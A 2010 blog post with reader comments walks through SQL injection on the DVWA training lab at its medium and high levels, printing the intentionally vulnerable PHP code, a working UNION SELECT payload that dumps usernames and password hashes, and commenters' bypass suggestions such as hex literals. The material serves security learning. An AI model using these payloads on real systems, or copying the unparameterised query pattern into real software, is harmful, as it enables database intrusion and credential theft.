SQL Injection DVWA Continued…

June 13, 2010 at 7:59 pm (PHP, Programming, Security, SQL, SQL Injection)

Hey,

So continuing on from the low level, let’s take a look at the medium level. Here is the code:

<?php
if (isset($_GET['Submit'])) {
// Retrieve data
$id = $_GET['id'];
$id = mysql_real_escape_string($id);
$getid="SELECT first_name, last_name FROM users WHERE user_id = $id";
$result=mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
$num=mysql_numrows($result);
$i=0;
while ($i < $num) {
$first=mysql_result($result,$i,"first_name");
$last=mysql_result($result,$i,"last_name");
echo '<pre>';
echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
echo '</pre>';
$i++;
}
}
?>

So as you can see it is exactly the same apart from the:

$id = mysql_real_escape_string($id);

The only thing that this prevents us from doing compared to the low level is, using quotes. So we can simply own the level in the same manner just removing the quotes we used, like so:

ID: 1 union all select user,password from dvwa.users--
First name: admin
Surname: admin
ID: 1 union all select user,password from dvwa.users--
First name: admin
Surname: bf03145925aadc81e733e788aaa58fe3
ID: 1 union all select user,password from dvwa.users--
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: 1 union all select user,password from dvwa.users--
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 1 union all select user,password from dvwa.users--
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 1 union all select user,password from dvwa.users--
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99

As you can see exactly the same way, the reason that we can’t use quotes is pretty self explanatory from looking at this page.

Let’s talk about the high level then, first let’s take a look at the code:

<?php
if(isset($_GET['Submit'])){
// Retrieve data
$id = $_GET['id'];
$id = stripslashes($id);
$id = mysql_real_escape_string($id);
if (is_numeric($id)){
$getid="SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result=mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
$num=mysql_numrows($result);
$i=0;
while ($i < $num) {
$first=mysql_result($result,$i,"first_name");
$last=mysql_result($result,$i,"last_name");
echo '<pre>';
echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
echo '</pre>';
$i++;
}
}
}
?>

This has a lot more sanitization and as far as I am aware it is not exploitable. The problem is the following bit of code:

// Retrieve data
$id = $_GET['id'];
$id = stripslashes($id);
$id = mysql_real_escape_string($id);
if (is_numeric($id)){
$getid="SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result=mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );

I know I can bypass the mysql_real_escape_string($id) from the medium level. I am just not sure and have not found a way to successfully circumvent the stripslashes() and is_numeric() functions. If anyone has a way to circumvent this please let me know!

Advertisements

7 Comments

  1. Jake Black said,

    The medium level is not the same “apart from the mysql_real_escape_string() call.” There is also the difference that $id is single-quoted in the low level but not in the medium level, which makes all the difference.

    The high level is meant to be secure (unexploitable) I believe. So I guess it’s GOOD that you don’t see a way to break it. 🙂

    Thanks for your blog (a year later…)

  2. no name said,

    have u tried use ascii chars?

  3. eddy said,

    hello there,
    nice to meet you 🙂

    stripslashes()
    will reject single quoute (‘)
    ex. WHERE id=1’ <— single quote will reject

    so we can use other query for check,
    ex. WHERE id=1 AND 1=2–
    AND 1=2– <– can be used for replace single quote (')

    next, for is_numeric() function I'm still try to bypass it 😀

    #eddy
    sorry, my english is sooo badd T_T

  4. j4y said,

    hi,i want to make friend with you。can you contact me j4ymail@163.com

  5. j4y said,

    and i am analysing how to circumvent is_numeric()

  6. dog training said,

    This paragraph is actually a pleasant one it assists new web users, who are wishing for blogging.

  7. dogasantos said,

    to bypass is_numeric and evaluate your correct payload, you can use hexadecimal values. You can search for “Hexadecimal Literals” reference on mysql docs.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: